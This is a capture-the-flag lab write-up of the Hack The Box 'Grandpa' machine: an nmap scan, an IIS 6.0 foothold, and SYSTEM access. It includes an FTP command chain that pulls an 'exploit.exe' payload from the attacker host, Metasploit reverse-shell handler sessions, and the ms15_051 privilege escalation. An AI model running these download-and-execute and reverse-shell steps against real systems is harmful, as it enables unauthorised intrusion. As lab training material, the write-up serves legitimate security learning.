Grandpa

OS: Windows, Difficulty: Easy, IP: 10.10.10.14

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul 20 14:38:04 2019 as: nmap -sV -sC -O -A -p 80 -oN O-detailed 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unkown
|   Server Date: Sat, 20 Jul 2019 09:01:36 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   230.48 ms 10.10.14.1
2   230.74 ms 10.10.10.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 14:38:23 2019 -- 1 IP address (1 host up) scanned in 18.76 seconds

Only the web-server port was open so the obvious choice to look at it, but it was an error with no information, so I started smashing it with gobuster, dirbuster, and dirb, got few directories and with a little study found out that it was running FrontPage 5.X.Y.Z, tried some exploits, they didn't seem to work. So I attacked the IIS 6.0 server itself, apparently none of the MSF modules worked for me, so I chose the manual route and used the exploit mentioned below to get a low privileged shell.

Now plan of action was to upgrade this shell to NT Authority/SYSTEM, as this shell didn't even get me the user flag. I tried running windows exploit suggester and tried many exploits without metasploit but they didn't seem to work, however they should have, but to no avail, they didn't work for me.

Next plan of action was to upgrade the current shell to meterpreter to get better control. The main struggle was how to upload and execute my msfvenom payload. After a little research I learned that FTP can be used to achieve this task, however the shell was unstable to I can not send commands as usual but, ftp had me covered here.

Start your own FTP server using twistd. This allows anonymous logins

sudo twistd -n ftp -r . -p 21

On the windows box, I created a file with all the FTP commands that will fetch me my payload and put into the current directory (I chose %TEMP%)

echo open 10.10.14.8 >> $FILE_NAME & echo asdf >> $FILE_NAME & echo USER anonymous >> $FILE_NAME & echo PASS password >> $FILE_NAME & echo get exploit.exe >> $FILE_NAME & echo bye >> $FILE_NAME

Now, run these commands using ftp flags

ftp -ns:$FILE_NAME

This got me my payload on the box, and now I ran the payload to get a meterpreter shell.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > exploit -j -z
[*] Started reverse TCP handler on 10.10.14.8:9999
[*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.14:1051) at 2019-07-20 19:54:41 +0530
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

msf5 exploit(windows/local/ms10_015_kitrap0d) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2
SESSION => 2
msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 2688 launched.
[*] Reflectively injecting the exploit DLL into 2688...
[*] Injecting exploit into 2688...
[*] Exploit injected. Injecting payload into 2688...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.14:1059) at 2019-07-20 20:37:40 +0530

meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

However even with the system meterpreter shell I was not able to interact with the shells, so I had to migrate to another process and launch shell again to get interaction.

meterpreter > migrate 2292
[*] Migrating from 2688 to 2292...
[*] Migration completed successfully.
meterpreter > shell
Process 3396 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

User Own

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5***

Root Own

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e***

Learning Outcome

Learned quite a bunch from this box, how to target known vulnerabilities first, rather hunting down my own. How to use FTP to transfer files. Instability of exploits, something may work for somebody but, may not work for you. Overall a fun box.

PreviousBountyNextGranny

Last updated